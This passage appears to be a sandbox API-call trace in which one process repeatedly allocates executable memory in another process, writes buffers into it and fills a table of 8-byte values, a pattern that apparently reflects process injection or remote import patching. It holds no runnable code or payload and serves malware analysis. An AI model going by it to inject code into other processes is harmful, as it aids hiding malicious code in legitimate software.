BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.307] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.307] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.307] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.307] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.307] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a350, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.307] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.307] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949a96*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949a96*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0140.308] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.308] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.308] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.308] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.308] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.308] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.308] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.308] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.308] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.309] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.309] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.309] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.309] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a358, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.309] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2a, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.309] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949aa8*, NumberOfBytesToWrite=0x12, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949aa8*, NumberOfBytesWritten=0x28df88*=0x12) returned 0x0 [0140.309] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.310] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.310] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.310] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.310] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.310] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.310] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.311] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.311] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.311] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.311] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20022, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.311] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.311] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a360, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.311] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x20, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.311] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949f02*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949f02*, NumberOfBytesWritten=0x28df88*=0x8) returned 0x0 [0140.311] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.312] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.312] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.312] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.312] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.312] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.312] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.312] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.312] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.313] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.313] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20018, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.313] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.313] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a368, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.313] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.313] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949f0c*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949f0c*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0140.313] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.313] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.314] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.314] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.314] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.314] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.314] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.314] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.314] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.314] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.315] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.315] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.315] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a370, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.315] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.315] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949f16*, NumberOfBytesToWrite=0x5, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949f16*, NumberOfBytesWritten=0x28df88*=0x5) returned 0x0 [0140.315] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.315] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.315] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.316] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.316] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.316] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.316] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.316] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.316] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.316] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.317] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20015, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.317] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.317] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a378, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.317] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.317] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949f1e*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949f1e*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0140.317] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.317] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.317] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.318] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.318] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.318] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.318] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.318] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.318] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.318] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.318] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.318] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.319] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a380, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.319] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.319] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949f28*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949f28*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0140.319] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.319] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.319] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.319] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.320] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.320] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.320] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.320] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.320] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.320] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.320] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.320] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.320] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a388, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.321] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x20, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.321] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949f32*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949f32*, NumberOfBytesWritten=0x28df88*=0x8) returned 0x0 [0140.321] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.321] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.321] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.321] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.321] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.322] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.322] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 